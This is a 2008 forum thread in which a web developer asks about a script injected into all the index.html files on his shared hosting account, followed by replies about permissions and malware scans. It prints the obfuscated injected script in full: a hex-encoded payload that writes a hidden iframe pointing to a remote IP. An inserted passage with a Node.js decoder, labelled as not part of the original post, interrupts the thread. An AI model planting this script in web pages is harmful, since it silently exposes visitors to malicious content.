All the index.html files got hacked and a line inserted

Discussion in 'Hardware' started by nomax5, Jun 12, 2008.

  1. nomax5

    nomax5 Private E-2

    Hi,

    I have a hosting account with IX webhosting and have a number of websites on it.

    Yesterday, 11/6/2008 at 18:15 according to the change date on the files, every single index.html got a script line added to it.

    The script attempts to pop up the old “your computer is at risk”, install this anti-virus software.

    My question is this: some of the index.html files were group “root”, like the ones in the webalizer folders. I’m sure I don’t have root access on a shared server, so does that mean it’s not something I’ve done but a problem with the hosting security?


    This is the line of code that was added; it's way beyond my knowledge.
    Code:
    <script>
    <!--
    var d=document,kol=561;
    function O10H485016217A781(H485016217AB87){ function H485016217AF7A() {return 16;} return( parseInt(H485016217AB87,H485016217AF7A()));}function H485016217B772(H485016217BB6F){ function H485016217C762() {return 2;} var H485016217BF6B='';for(H485016217C366=0; H485016217C366<H485016217BB6F.length; H485016217C366+=H485016217C762()){ H485016217BF6B += ( String.fromCharCode (O10H485016217A781(H485016217BB6F.substr(H485016217C366, H485016217C762()))));}return H485016217BF6B;} document.write(H485016217B772('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3935303438292B27396635375C272077696474683D343336206865696768743D323138207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
    //-->
    </script>
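
What the added line does can be read without running it: the long quoted string is hex-encoded text that the script converts back to characters with parseInt(…, 16) and String.fromCharCode and then hands to document.write. The following Node.js sketch is an added example, not part of the original post; it decodes such literals statically and reports any hidden IFRAME, and its function names and sample line (host injected.example) are constructed for illustration.

```javascript
// Static decoder: it never eval()s or renders the script it inspects.
const MIN_HEX_CHARS = 40; // skip short literals such as colour codes

// Decode every quoted literal that consists only of hex byte pairs.
function decodeHexLiterals(source) {
  const literal = /(['"])((?:[0-9A-Fa-f]{2})+)\1/g;
  const decoded = [];
  for (const m of source.matchAll(literal)) {
    if (m[2].length >= MIN_HEX_CHARS) {
      decoded.push(Buffer.from(m[2], 'hex').toString('latin1'));
    }
  }
  return decoded;
}

// List IFRAME tags in decoded text and whether CSS hides them from the visitor.
function findIframes(text) {
  const findings = [];
  for (const m of text.matchAll(/<iframe\b[^>]*>/gi)) {
    const tag = m[0];
    // The src value may be wrapped in escaped quotes (\') inside a JS string.
    const src = /src\s*=\s*\\?['"]?([^'"\\\s>]+)/i.exec(tag);
    findings.push({
      src: src ? src[1] : null,
      hidden: /display\s*:\s*none|visibility\s*:\s*hidden/i.test(tag),
    });
  }
  return findings;
}

// Full pass over one script: decode the literals, then inspect each result.
function analyzeInjectedScript(source) {
  return decodeHexLiterals(source).flatMap(findIframes);
}

// Constructed sample (not the payload from the post), hex-encoded the same way.
const SAMPLE_PAYLOAD =
  "<script>document.write('<IFRAME src=\\'http://injected.example/go.html\\' " +
  "style=\\'display: none\\'></IFRAME>');</script>";
const SAMPLE_LINE =
  "document.write(unhex('" +
  Buffer.from(SAMPLE_PAYLOAD, 'latin1').toString('hex').toUpperCase() +
  "'));";

console.log(analyzeInjectedScript(SAMPLE_LINE));
```

Run against a saved copy of an affected index.html, the same functions show where the hidden frame points without the page ever being opened in a browser.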
     
  2. nomax5

    nomax5 Private E-2

    Is this post in the wrong place or the wrong website or something?
     
  3. nomax5

    nomax5 Private E-2

    I did that and their answer was unbelievable.

    Their response was
    they gave me permission to change the file?. Unbelievable ..

    But still I think I might be wrong and I still think it might be me that has done it.

    I chmoded some of the index.html files from 644 to be 444 so I don't have the permission to change them (unless I chmod them first)

    And sure enough it happened again, but only to the files with 644. That's what makes me think it might be me.

    The blog in the link above seems to suggest that something on my PC may be accessing my FTP accounts so I ran a virus checker - this free one http://housecall.trendmicro.com/uk/

    It took over an hour and didn't find anything.

    I'm just a simple web developer; this unix / hacking stuff is beyond me.
    All the sites I create have something good about them and visitors always get something for free.
     
  4. sosaman

    sosaman Sergeant Major

    if you think it's malware related, then run your comp thru the malware forum. not any 1 antivirus program, or any antispyware program is going to catch everything. the idea is to run a combination of programs/scans, and hopefully with this combination, you will catch everything.

    http://forums.majorgeeks.com/showthread.php?t=35407 <-- READ & RUN ME FIRST Before Asking for Support

    i'd say, if you're not sure, then the only way to rule out your comp is to go thru these steps. g/l, sos

    edit - also, what protection (ie - firewall, antivirus program, etc) do you have on your computer already? i'm asking because you said you ran a free scan of trendmicro, instead of what you might have installed?? - sos
     
